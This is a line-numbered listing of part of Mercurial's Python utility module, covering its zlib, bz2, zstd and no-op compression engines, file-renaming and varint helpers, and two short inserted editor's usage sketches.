3176 3175 raise error.Abort(_('compression engine %s could not be loaded') %
3177 3176 engine.name())
3178 3177 return engine
3179 3178
3180 3179 def supportedwireengines(self, role, onlyavailable=True):
3181 3180 """Obtain compression engines that support the wire protocol.
3182 3181
3183 3182 Returns a list of engines in prioritized order, most desired first.
3184 3183
3185 3184 If ``onlyavailable`` is set, filter out engines that can't be
3186 3185 loaded.
3187 3186 """
3188 3187 assert role in (SERVERROLE, CLIENTROLE)
3189 3188
3190 3189 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3191 3190
3192 3191 engines = [self._engines[e] for e in self._wiretypes.values()]
3193 3192 if onlyavailable:
3194 3193 engines = [e for e in engines if e.available()]
3195 3194
3196 3195 def getkey(e):
3197 3196 # Sort first by priority, highest first. In case of tie, sort
3198 3197 # alphabetically. This is arbitrary, but ensures output is
3199 3198 # stable.
3200 3199 w = e.wireprotosupport()
3201 3200 return -1 * getattr(w, attr), w.name
3202 3201
3203 3202 return list(sorted(engines, key=getkey))
3204 3203
3205 3204 def forwiretype(self, wiretype):
3206 3205 engine = self._engines[self._wiretypes[wiretype]]
3207 3206 if not engine.available():
3208 3207 raise error.Abort(_('compression engine %s could not be loaded') %
3209 3208 engine.name())
3210 3209 return engine
3211 3210
3212 3211 def forrevlogheader(self, header):
3213 3212 """Obtain a compression engine registered to a revlog header.
3214 3213
3215 3214 Will raise KeyError if the revlog header value isn't registered.
3216 3215 """
3217 3216 return self._engines[self._revlogheaders[header]]
3218 3217
3219 3218 compengines = compressormanager()
3220 3219
3221 3220 class compressionengine(object):
3222 3221 """Base class for compression engines.
3223 3222
3224 3223 Compression engines must implement the interface defined by this class.
3225 3224 """
3226 3225 def name(self):
3227 3226 """Returns the name of the compression engine.
3228 3227
3229 3228 This is the key the engine is registered under.
3230 3229
3231 3230 This method must be implemented.
3232 3231 """
3233 3232 raise NotImplementedError()
3234 3233
3235 3234 def available(self):
3236 3235 """Whether the compression engine is available.
3237 3236
3238 3237 The intent of this method is to allow optional compression engines
3239 3238 that may not be available in all installations (such as engines relying
3240 3239 on C extensions that may not be present).
3241 3240 """
3242 3241 return True
3243 3242
3244 3243 def bundletype(self):
3245 3244 """Describes bundle identifiers for this engine.
3246 3245
3247 3246 If this compression engine isn't supported for bundles, returns None.
3248 3247
3249 3248 If this engine can be used for bundles, returns a 2-tuple of strings of
3250 3249 the user-facing "bundle spec" compression name and an internal
3251 3250 identifier used to denote the compression format within bundles. To
3252 3251 exclude the name from external usage, set the first element to ``None``.
3253 3252
3254 3253 If bundle compression is supported, the class must also implement
3255 3254 ``compressstream`` and ``decompressorreader``.
3256 3255
3257 3256 The docstring of this method is used in the help system to tell users
3258 3257 about this engine.
3259 3258 """
3260 3259 return None
3261 3260
3262 3261 def wireprotosupport(self):
3263 3262 """Declare support for this compression format on the wire protocol.
3264 3263
3265 3264 If this compression engine isn't supported for compressing wire
3266 3265 protocol payloads, returns None.
3267 3266
3268 3267 Otherwise, returns ``compenginewireprotosupport`` with the following
3269 3268 fields:
3270 3269
3271 3270 * String format identifier
3272 3271 * Integer priority for the server
3273 3272 * Integer priority for the client
3274 3273
3275 3274 The integer priorities are used to order the advertisement of format
3276 3275 support by server and client. The highest integer is advertised
3277 3276 first. Integers with non-positive values aren't advertised.
3278 3277
3279 3278 The priority values are somewhat arbitrary and only used for default
3280 3279 ordering. The relative order can be changed via config options.
3281 3280
3282 3281 If wire protocol compression is supported, the class must also implement
3283 3282 ``compressstream`` and ``decompressorreader``.
3284 3283 """
3285 3284 return None
3286 3285
3287 3286 def revlogheader(self):
3288 3287 """Header added to revlog chunks that identifies this engine.
3289 3288
3290 3289 If this engine can be used to compress revlogs, this method should
3291 3290 return the bytes used to identify chunks compressed with this engine.
3292 3291 Else, the method should return ``None`` to indicate it does not
3293 3292 participate in revlog compression.
3294 3293 """
3295 3294 return None
3296 3295
3297 3296 def compressstream(self, it, opts=None):
3298 3297 """Compress an iterator of chunks.
3299 3298
3300 3299 The method receives an iterator (ideally a generator) of chunks of
3301 3300 bytes to be compressed. It returns an iterator (ideally a generator)
3302 3301 of bytes of chunks representing the compressed output.
3303 3302
3304 3303 Optionally accepts an argument defining how to perform compression.
3305 3304 Each engine treats this argument differently.
3306 3305 """
3307 3306 raise NotImplementedError()
3308 3307
3309 3308 def decompressorreader(self, fh):
3310 3309 """Perform decompression on a file object.
3311 3310
3312 3311 Argument is an object with a ``read(size)`` method that returns
3313 3312 compressed data. Return value is an object with a ``read(size)`` that
3314 3313 returns uncompressed data.
3315 3314 """
3316 3315 raise NotImplementedError()
3317 3316
3318 3317 def revlogcompressor(self, opts=None):
3319 3318 """Obtain an object that can be used to compress revlog entries.
3320 3319
3321 3320 The object has a ``compress(data)`` method that compresses binary
3322 3321 data. This method returns compressed binary data or ``None`` if
3323 3322 the data could not be compressed (too small, not compressible, etc).
3324 3323 The returned data should have a header uniquely identifying this
3325 3324 compression format so decompression can be routed to this engine.
3326 3325 This header should be identified by the ``revlogheader()`` return
3327 3326 value.
3328 3327
3329 3328 The object has a ``decompress(data)`` method that decompresses
3330 3329 data. The method will only be called if ``data`` begins with
3331 3330 ``revlogheader()``. The method should return the raw, uncompressed
3332 3331 data or raise a ``RevlogError``.
3333 3332
3334 3333 The object is reusable but is not thread safe.
3335 3334 """
3336 3335 raise NotImplementedError()
3337 3336
3338 3337 class _zlibengine(compressionengine):
3339 3338 def name(self):
3340 3339 return 'zlib'
3341 3340
3342 3341 def bundletype(self):
3343 3342 """zlib compression using the DEFLATE algorithm.
3344 3343
3345 3344 All Mercurial clients should support this format. The compression
3346 3345 algorithm strikes a reasonable balance between compression ratio
3347 3346 and size.
3348 3347 """
3349 3348 return 'gzip', 'GZ'
3350 3349
3351 3350 def wireprotosupport(self):
3352 3351 return compewireprotosupport('zlib', 20, 20)
3353 3352
3354 3353 def revlogheader(self):
3355 3354 return 'x'
3356 3355
3357 3356 def compressstream(self, it, opts=None):
3358 3357 opts = opts or {}
3359 3358
3360 3359 z = zlib.compressobj(opts.get('level', -1))
3361 3360 for chunk in it:
3362 3361 data = z.compress(chunk)
3363 3362 # Not all calls to compress emit data. It is cheaper to inspect
3364 3363 # here than to feed empty chunks through generator.
3365 3364 if data:
3366 3365 yield data
3367 3366
3368 3367 yield z.flush()
3369 3368
3370 3369 def decompressorreader(self, fh):
3371 3370 def gen():
3372 3371 d = zlib.decompressobj()
3373 3372 for chunk in filechunkiter(fh):
3374 3373 while chunk:
3375 3374 # Limit output size to limit memory.
3376 3375 yield d.decompress(chunk, 2 ** 18)
3377 3376 chunk = d.unconsumed_tail
3378 3377
3379 3378 return chunkbuffer(gen())
3380 3379
3381 3380 class zlibrevlogcompressor(object):
3382 3381 def compress(self, data):
3383 3382 insize = len(data)
3384 3383 # Caller handles empty input case.
3385 3384 assert insize > 0
3386 3385
3387 3386 if insize < 44:
3388 3387 return None
3389 3388
3390 3389 elif insize <= 1000000:
3391 3390 compressed = zlib.compress(data)
3392 3391 if len(compressed) < insize:
3393 3392 return compressed
3394 3393 return None
3395 3394
3396 3395 # zlib makes an internal copy of the input buffer, doubling
3397 3396 # memory usage for large inputs. So do streaming compression
3398 3397 # on large inputs.
3399 3398 else:
3400 3399 z = zlib.compressobj()
3401 3400 parts = []
3402 3401 pos = 0
3403 3402 while pos < insize:
3404 3403 pos2 = pos + 2**20
3405 3404 parts.append(z.compress(data[pos:pos2]))
3406 3405 pos = pos2
3407 3406 parts.append(z.flush())
3408 3407
3409 3408 if sum(map(len, parts)) < insize:
3410 3409 return ''.join(parts)
3411 3410 return None
3412 3411
3413 3412 def decompress(self, data):
3414 3413 try:
3415 3414 return zlib.decompress(data)
3416 3415 except zlib.error as e:
3417 3416 raise error.RevlogError(_('revlog decompress error: %s') %
3418 3417 stringutil.forcebytestr(e))
3419 3418
3420 3419 def revlogcompressor(self, opts=None):
3421 3420 return self.zlibrevlogcompressor()
3422 3421
3423 3422 compengines.register(_zlibengine())
3424 3423
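# Editor's note: illustrative sketch only; io.BytesIO stands in for a real
# stream, and 'gzip' is the bundle spec name registered by the zlib engine just
# above. It shows how callers resolve an engine through the global manager and
# round-trip data through compressstream()/decompressorreader().
import io

engine = compengines.forbundlename('gzip')
payload = b'some payload worth compressing'
compressed = b''.join(engine.compressstream(iter([payload])))
reader = engine.decompressorreader(io.BytesIO(compressed))
assert reader.read(len(payload)) == payload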
3425 3424 class _bz2engine(compressionengine):
3426 3425 def name(self):
3427 3426 return 'bz2'
3428 3427
3429 3428 def bundletype(self):
3430 3429 """An algorithm that produces smaller bundles than ``gzip``.
3431 3430
3432 3431 All Mercurial clients should support this format.
3433 3432
3434 3433 This engine will likely produce smaller bundles than ``gzip`` but
3435 3434 will be significantly slower, both during compression and
3436 3435 decompression.
3437 3436
3438 3437 If available, the ``zstd`` engine can yield similar or better
3439 3438 compression at much higher speeds.
3440 3439 """
3441 3440 return 'bzip2', 'BZ'
3442 3441
3443 3442 # We declare a protocol name but don't advertise by default because
3444 3443 # it is slow.
3445 3444 def wireprotosupport(self):
3446 3445 return compewireprotosupport('bzip2', 0, 0)
3447 3446
3448 3447 def compressstream(self, it, opts=None):
3449 3448 opts = opts or {}
3450 3449 z = bz2.BZ2Compressor(opts.get('level', 9))
3451 3450 for chunk in it:
3452 3451 data = z.compress(chunk)
3453 3452 if data:
3454 3453 yield data
3455 3454
3456 3455 yield z.flush()
3457 3456
3458 3457 def decompressorreader(self, fh):
3459 3458 def gen():
3460 3459 d = bz2.BZ2Decompressor()
3461 3460 for chunk in filechunkiter(fh):
3462 3461 yield d.decompress(chunk)
3463 3462
3464 3463 return chunkbuffer(gen())
3465 3464
3466 3465 compengines.register(_bz2engine())
3467 3466
3468 3467 class _truncatedbz2engine(compressionengine):
3469 3468 def name(self):
3470 3469 return 'bz2truncated'
3471 3470
3472 3471 def bundletype(self):
3473 3472 return None, '_truncatedBZ'
3474 3473
3475 3474 # We don't implement compressstream because it is hackily handled elsewhere.
3476 3475
3477 3476 def decompressorreader(self, fh):
3478 3477 def gen():
3479 3478 # The input stream doesn't have the 'BZ' header. So add it back.
3480 3479 d = bz2.BZ2Decompressor()
3481 3480 d.decompress('BZ')
3482 3481 for chunk in filechunkiter(fh):
3483 3482 yield d.decompress(chunk)
3484 3483
3485 3484 return chunkbuffer(gen())
3486 3485
3487 3486 compengines.register(_truncatedbz2engine())
3488 3487
3489 3488 class _noopengine(compressionengine):
3490 3489 def name(self):
3491 3490 return 'none'
3492 3491
3493 3492 def bundletype(self):
3494 3493 """No compression is performed.
3495 3494
3496 3495 Use this compression engine to explicitly disable compression.
3497 3496 """
3498 3497 return 'none', 'UN'
3499 3498
3500 3499 # Clients always support uncompressed payloads. Servers don't because
3501 3500 # unless you are on a fast network, uncompressed payloads can easily
3502 3501 # saturate your network pipe.
3503 3502 def wireprotosupport(self):
3504 3503 return compewireprotosupport('none', 0, 10)
3505 3504
3506 3505 # We don't implement revlogheader because it is handled specially
3507 3506 # in the revlog class.
3508 3507
3509 3508 def compressstream(self, it, opts=None):
3510 3509 return it
3511 3510
3512 3511 def decompressorreader(self, fh):
3513 3512 return fh
3514 3513
3515 3514 class nooprevlogcompressor(object):
3516 3515 def compress(self, data):
3517 3516 return None
3518 3517
3519 3518 def revlogcompressor(self, opts=None):
3520 3519 return self.nooprevlogcompressor()
3521 3520
3522 3521 compengines.register(_noopengine())
3523 3522
3524 3523 class _zstdengine(compressionengine):
3525 3524 def name(self):
3526 3525 return 'zstd'
3527 3526
3528 3527 @propertycache
3529 3528 def _module(self):
3530 3529 # Not all installs have the zstd module available. So defer importing
3531 3530 # until first access.
3532 3531 try:
3533 3532 from . import zstd
3534 3533 # Force delayed import.
3535 3534 zstd.__version__
3536 3535 return zstd
3537 3536 except ImportError:
3538 3537 return None
3539 3538
3540 3539 def available(self):
3541 3540 return bool(self._module)
3542 3541
3543 3542 def bundletype(self):
3544 3543 """A modern compression algorithm that is fast and highly flexible.
3545 3544
3546 3545 Only supported by Mercurial 4.1 and newer clients.
3547 3546
3548 3547 With the default settings, zstd compression is both faster and yields
3549 3548 better compression than ``gzip``. It also frequently yields better
3550 3549 compression than ``bzip2`` while operating at much higher speeds.
3551 3550
3552 3551 If this engine is available and backwards compatibility is not a
3553 3552 concern, it is likely the best available engine.
3554 3553 """
3555 3554 return 'zstd', 'ZS'
3556 3555
3557 3556 def wireprotosupport(self):
3558 3557 return compewireprotosupport('zstd', 50, 50)
3559 3558
3560 3559 def revlogheader(self):
3561 3560 return '\x28'
3562 3561
3563 3562 def compressstream(self, it, opts=None):
3564 3563 opts = opts or {}
3565 3564 # zstd level 3 is almost always significantly faster than zlib
3566 3565 # while providing no worse compression. It strikes a good balance
3567 3566 # between speed and compression.
3568 3567 level = opts.get('level', 3)
3569 3568
3570 3569 zstd = self._module
3571 3570 z = zstd.ZstdCompressor(level=level).compressobj()
3572 3571 for chunk in it:
3573 3572 data = z.compress(chunk)
3574 3573 if data:
3575 3574 yield data
3576 3575
3577 3576 yield z.flush()
3578 3577
3579 3578 def decompressorreader(self, fh):
3580 3579 zstd = self._module
3581 3580 dctx = zstd.ZstdDecompressor()
3582 3581 return chunkbuffer(dctx.read_from(fh))
3583 3582
3584 3583 class zstdrevlogcompressor(object):
3585 3584 def __init__(self, zstd, level=3):
3586 3585 # TODO consider omitting frame magic to save 4 bytes.
3587 3586 # This writes content sizes into the frame header. That is
3588 3587 # extra storage. But it allows a correct size memory allocation
3589 3588 # to hold the result.
3590 3589 self._cctx = zstd.ZstdCompressor(level=level)
3591 3590 self._dctx = zstd.ZstdDecompressor()
3592 3591 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3593 3592 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3594 3593
3595 3594 def compress(self, data):
3596 3595 insize = len(data)
3597 3596 # Caller handles empty input case.
3598 3597 assert insize > 0
3599 3598
3600 3599 if insize < 50:
3601 3600 return None
3602 3601
3603 3602 elif insize <= 1000000:
3604 3603 compressed = self._cctx.compress(data)
3605 3604 if len(compressed) < insize:
3606 3605 return compressed
3607 3606 return None
3608 3607 else:
3609 3608 z = self._cctx.compressobj()
3610 3609 chunks = []
3611 3610 pos = 0
3612 3611 while pos < insize:
3613 3612 pos2 = pos + self._compinsize
3614 3613 chunk = z.compress(data[pos:pos2])
3615 3614 if chunk:
3616 3615 chunks.append(chunk)
3617 3616 pos = pos2
3618 3617 chunks.append(z.flush())
3619 3618
3620 3619 if sum(map(len, chunks)) < insize:
3621 3620 return ''.join(chunks)
3622 3621 return None
3623 3622
3624 3623 def decompress(self, data):
3625 3624 insize = len(data)
3626 3625
3627 3626 try:
3628 3627 # This was measured to be faster than other streaming
3629 3628 # decompressors.
3630 3629 dobj = self._dctx.decompressobj()
3631 3630 chunks = []
3632 3631 pos = 0
3633 3632 while pos < insize:
3634 3633 pos2 = pos + self._decompinsize
3635 3634 chunk = dobj.decompress(data[pos:pos2])
3636 3635 if chunk:
3637 3636 chunks.append(chunk)
3638 3637 pos = pos2
3639 3638 # Frame should be exhausted, so no finish() API.
3640 3639
3641 3640 return ''.join(chunks)
3642 3641 except Exception as e:
3643 3642 raise error.RevlogError(_('revlog decompress error: %s') %
3644 3643 stringutil.forcebytestr(e))
3645 3644
3646 3645 def revlogcompressor(self, opts=None):
3647 3646 opts = opts or {}
3648 3647 return self.zstdrevlogcompressor(self._module,
3649 3648 level=opts.get('level', 3))
3650 3649
3651 3650 compengines.register(_zstdengine())
3652 3651
3653 3652 def bundlecompressiontopics():
3654 3653 """Obtains a list of available bundle compressions for use in help."""
3655 3654 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3656 3655 items = {}
3657 3656
3658 3657 # We need to format the docstring. So use a dummy object/type to hold it
3659 3658 # rather than mutating the original.
3660 3659 class docobject(object):
3661 3660 pass
3662 3661
3663 3662 for name in compengines:
3664 3663 engine = compengines[name]
3665 3664
3666 3665 if not engine.available():
3667 3666 continue
3668 3667
3669 3668 bt = engine.bundletype()
3670 3669 if not bt or not bt[0]:
3671 3670 continue
3672 3671
3673 3672 doc = pycompat.sysstr('``%s``\n %s') % (
3674 3673 bt[0], engine.bundletype.__doc__)
3675 3674
3676 3675 value = docobject()
3677 3676 value.__doc__ = doc
3678 3677 value._origdoc = engine.bundletype.__doc__
3679 3678 value._origfunc = engine.bundletype
3680 3679
3681 3680 items[bt[0]] = value
3682 3681
3683 3682 return items
3684 3683
3685 3684 i18nfunctions = bundlecompressiontopics().values()
3686 3685
3687 3686 # convenient shortcut
3688 3687 dst = debugstacktrace
3689 3688
3690 3689 def safename(f, tag, ctx, others=None):
3691 3690 """
3692 3691 Generate a name that it is safe to rename f to in the given context.
3693 3692
3694 3693 f: filename to rename
3695 3694 tag: a string tag that will be included in the new name
3696 3695 ctx: a context, in which the new name must not exist
3697 3696 others: a set of other filenames that the new name must not be in
3698 3697
3699 3698 Returns a file name of the form oldname~tag[~number] which does not exist
3700 3699 in the provided context and is not in the set of other names.
3701 3700 """
3702 3701 if others is None:
3703 3702 others = set()
3704 3703
3705 3704 fn = '%s~%s' % (f, tag)
3706 3705 if fn not in ctx and fn not in others:
3707 3706 return fn
3708 3707 for n in itertools.count(1):
3709 3708 fn = '%s~%s~%s' % (f, tag, n)
3710 3709 if fn not in ctx and fn not in others:
3711 3710 return fn
3712 3711
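# Editor's note: illustrative sketch only. The empty dict stands in for a real
# changectx, and the file name and tag are made up.
taken = {b'file.txt~backup'}
assert safename(b'file.txt', b'backup', ctx={}, others=taken) == b'file.txt~backup~1'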
3713 3712 def readexactly(stream, n):
3714 3713 '''read n bytes from stream.read and abort if less was available'''
3715 3714 s = stream.read(n)
3716 3715 if len(s) < n:
3717 3716 raise error.Abort(_("stream ended unexpectedly"
3718 3717 " (got %d bytes, expected %d)")
3719 3718 % (len(s), n))
3720 3719 return s
3721 3720
3722 3721 def uvarintencode(value):
3723 3722 """Encode an unsigned integer value to a varint.
3724 3723
3725 3724 A varint is a variable length integer of 1 or more bytes. Each byte
3726 3725 except the last has the most significant bit set. The lower 7 bits of
3727 3726 each byte store the 2's complement representation, least significant group
3728 3727 first.
3729 3728
3730 3729 >>> uvarintencode(0)
3731 3730 '\\x00'
3732 3731 >>> uvarintencode(1)
3733 3732 '\\x01'
3734 3733 >>> uvarintencode(127)
3735 3734 '\\x7f'
3736 3735 >>> uvarintencode(1337)
3737 3736 '\\xb9\\n'
3738 3737 >>> uvarintencode(65536)
3739 3738 '\\x80\\x80\\x04'
3740 3739 >>> uvarintencode(-1)
3741 3740 Traceback (most recent call last):
3742 3741 ...
3743 3742 ProgrammingError: negative value for uvarint: -1
3744 3743 """
3745 3744 if value < 0:
3746 3745 raise error.ProgrammingError('negative value for uvarint: %d'
3747 3746 % value)
3748 3747 bits = value & 0x7f
3749 3748 value >>= 7
3750 3749 bytes = []
3751 3750 while value:
3752 3751 bytes.append(pycompat.bytechr(0x80 | bits))
3753 3752 bits = value & 0x7f
3754 3753 value >>= 7
3755 3754 bytes.append(pycompat.bytechr(bits))
3756 3755
3757 3756 return ''.join(bytes)
3758 3757
3759 3758 def uvarintdecodestream(fh):
3760 3759 """Decode an unsigned variable length integer from a stream.
3761 3760
3762 3761 The passed argument is anything that has a ``.read(N)`` method.
3763 3762
3764 3763 >>> try:
3765 3764 ... from StringIO import StringIO as BytesIO
3766 3765 ... except ImportError:
3767 3766 ... from io import BytesIO
3768 3767 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3769 3768 0
3770 3769 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3771 3770 1
3772 3771 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3773 3772 127
3774 3773 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3775 3774 1337
3776 3775 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3777 3776 65536
3778 3777 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3779 3778 Traceback (most recent call last):
3780 3779 ...
3781 3780 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3782 3781 """
3783 3782 result = 0
3784 3783 shift = 0
3785 3784 while True:
3786 3785 byte = ord(readexactly(fh, 1))
3787 3786 result |= ((byte & 0x7f) << shift)
3788 3787 if not (byte & 0x80):
3789 3788 return result
3790 3789 shift += 7